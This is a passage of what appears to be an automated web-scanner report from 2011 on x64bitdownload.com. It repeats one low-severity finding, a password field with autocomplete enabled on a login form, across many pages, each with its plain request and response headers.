15.269. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-trollkiller-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-trollkiller-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28488


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.270. http://www.x64bitdownload.com/64-bit-use-next-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-use-next-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-use-next-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60741


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.271. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37040


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.272. http://www.x64bitdownload.com/64-bit-usenet-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-usenet-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.273. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-search-engine-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-usenet-search-engine-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.274. http://www.x64bitdownload.com/64-bit-usenext-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenext-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-usenext-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.275. http://www.x64bitdownload.com/64-bit-video-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-video-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-video-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.276. http://www.x64bitdownload.com/64-bit-xpat-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-xpat-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-xpat-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:08 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28893


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.277. http://www.x64bitdownload.com/64-bit-yenc-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-yenc-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-yenc-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.278. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /a-oz-insight-1768-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /a-oz-insight-1768-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:08 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 26030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.279. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.280. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-business-downloads-2-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85656


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.281. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.282. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66926


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.283. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-communications-downloads-3-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:39 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.284. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79258


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.285. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.286. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

